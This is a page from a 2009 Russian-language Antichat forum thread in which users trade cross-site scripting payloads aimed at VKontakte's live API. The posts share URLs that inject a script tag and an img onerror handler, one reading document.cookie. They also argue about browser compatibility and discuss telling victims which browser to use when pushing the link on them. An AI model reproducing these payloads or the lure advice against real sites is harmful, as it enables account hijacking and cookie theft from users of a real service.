Форум АНТИЧАТ
Страница 1 из 5 1 2 3 4 5 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Социальные сети (https://forum.antichat.xyz/forumdisplay.php?f=133)
-   -   Active xss vkontakte.ru (https://forum.antichat.xyz/showthread.php?t=122491)

Isis 27.05.2009 05:44
Active xss vkontakte.ru
 
http://api.vkontakte.ru/api.php?v=2.0&sig=%3Cscript%3Ealert(document.cooki e)%3C/script%3E&format=JSON&api_id=517649&method=getAppF riends

Добейте
http://forums.goha.ru/images/smilies/pandaredlol.gif

Ponchik 27.05.2009 08:31
Ты уверен, что это активка? =\
И в опере не катит =\

Rebit 27.05.2009 08:40
Да в Опере не пашет и в Internet Explorer тоже

vp$ 27.05.2009 09:22
слэш в закрывающем тэге экранируется, а так бы сработало

BlackSun 27.05.2009 10:10
Изя лох :( это пассивка,

http://api.vkontakte.ru/api.php?v=2.0&sig=<img+src=.+onerror=alert()>&form at=JSON&api_id=517649&method=getAppFriends

wildshaman 27.05.2009 10:20
А изя промазнулся, а изя проманхнулся :D

wildshaman 27.05.2009 10:21
мб перенесете в приват? А то щас же школья набежит тут, а чо, а кто, а зачем это и т д...

Sin3v 27.05.2009 10:57
Ха токо в IE пашет и это пассивка, нафиг она, все щас сидят на мозиле и опере. Так уж при впаривании надо говорить зайди через такой браузер иначе страница не загрузится.

Я две нашел в более легких условиях и где досих пор пашет))

brain[pillow] 27.05.2009 11:11
Это пассивка и пашет она под все браузеры

wildshaman 27.05.2009 11:31
Цитата:
Сообщение от Sin3v
Ха токо в IE пашет и это пассивка, нафиг она, все щас сидят на мозиле и опере. Так уж при впаривании надо говорить зайди через такой браузер иначе страница не загрузится.

Я две нашел в более легких условиях и где досих пор пашет))
dj всех браузерах работает :)


Время: 17:56
Страница 1 из 5 1 2 3 4 5 >
Показывать 40 сообщений этой темы на одной странице